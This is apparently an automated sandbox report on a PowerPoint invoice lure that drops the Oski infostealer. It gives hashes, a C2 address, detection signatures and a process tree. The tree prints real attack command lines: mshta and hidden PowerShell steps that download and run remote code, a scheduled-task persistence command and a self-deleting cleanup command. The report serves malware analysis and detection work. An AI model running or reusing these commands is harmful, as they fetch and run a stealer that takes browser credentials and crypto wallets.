Resubmissions

13/08/2021, 09:28

210813-fnjyawq6ws 10

13/08/2021, 09:23

210813-swdjcyat5e 10

13/08/2021, 07:05

210813-4dy26bbdfe 10

03/08/2021, 07:47

210803-jrlp4kfgt2 10

Analysis

  • max time kernel
    242s
  • max time network
    210s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    03/08/2021, 07:47

General

  • Target

    InvoiceNo_8041766.ppt

  • Size

    82KB

  • MD5

    c27b99ba1c1e0e88a8362fd5b9193499

  • SHA1

    4aa04165daad8a8827d39067b117c2a81399f87d

  • SHA256

    c9eef29af749ee4e022d0852bfec6b85a382cb50d0dfcab2eeed1a89499fde48

  • SHA512

    8c7c17959905a83b503d5a1892a9950399ae6d1f0b4859a4b2cfaf0c0bb176cebf64d9992b93d5b32d8aca95dff13821303ad5d234109f65de4ac03fdc80a892

Malware Config

Extracted

Family

oski

C2

103.99.1.60/we/2ky/

Signatures

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Blocklisted process makes network request 19 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 5 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 1 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\InvoiceNo_8041766.ppt"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:1032
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2000
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe rubishdata/Rmshta https://www.bitly.com/twyuiqbdhsavbdsabdjsd
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1444
        • C:\Windows\SysWOW64\mshta.exe
          mshta https://www.bitly.com/twyuiqbdhsavbdsabdjsd
          3⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:1624
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h i'E'x(iwr('https://ia601400.us.archive.org/2/items/2kyfriend/2kyfriend.txt') -useB);
            4⤵
            • Blocklisted process makes network request
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1864
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              #cmd
              5⤵
              • Loads dropped DLL
              • Checks processor information in registry
              • Suspicious use of WriteProcessMemory
              PID:568
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /pid 568 & erase C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe & RD /S /Q C:\\ProgramData\\635786962599557\\* & exit
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1808
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /pid 568
                  7⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:828
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/2kyfriend.html\""
            4⤵
            • Creates scheduled task(s)
            PID:1524

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/568-103-0x0000000000400000-0x0000000000438000-memory.dmp

            Filesize

            224KB

          • memory/568-100-0x0000000000400000-0x0000000000438000-memory.dmp

            Filesize

            224KB

          • memory/1032-64-0x0000000075591000-0x0000000075593000-memory.dmp

            Filesize

            8KB

          • memory/1032-60-0x0000000073AE1000-0x0000000073AE5000-memory.dmp

            Filesize

            16KB

          • memory/1032-69-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/1032-62-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/1032-61-0x0000000071191000-0x0000000071193000-memory.dmp

            Filesize

            8KB

          • memory/1864-95-0x00000000062C0000-0x00000000062C1000-memory.dmp

            Filesize

            4KB

          • memory/1864-96-0x000000007EF30000-0x000000007EF31000-memory.dmp

            Filesize

            4KB

          • memory/1864-94-0x0000000006280000-0x0000000006281000-memory.dmp

            Filesize

            4KB

          • memory/1864-87-0x0000000006160000-0x0000000006161000-memory.dmp

            Filesize

            4KB

          • memory/1864-99-0x0000000006270000-0x000000000627C000-memory.dmp

            Filesize

            48KB

          • memory/1864-86-0x00000000056C0000-0x00000000056C1000-memory.dmp

            Filesize

            4KB

          • memory/1864-81-0x0000000005650000-0x0000000005651000-memory.dmp

            Filesize

            4KB

          • memory/1864-78-0x0000000004850000-0x0000000004851000-memory.dmp

            Filesize

            4KB

          • memory/1864-77-0x0000000002580000-0x0000000002581000-memory.dmp

            Filesize

            4KB

          • memory/1864-75-0x00000000048D0000-0x00000000048D1000-memory.dmp

            Filesize

            4KB

          • memory/1864-76-0x00000000048D2000-0x00000000048D3000-memory.dmp

            Filesize

            4KB

          • memory/1864-74-0x0000000004910000-0x0000000004911000-memory.dmp

            Filesize

            4KB

          • memory/1864-73-0x0000000000DE0000-0x0000000000DE1000-memory.dmp

            Filesize

            4KB

          • memory/2000-65-0x000007FEFB991000-0x000007FEFB993000-memory.dmp

            Filesize

            8KB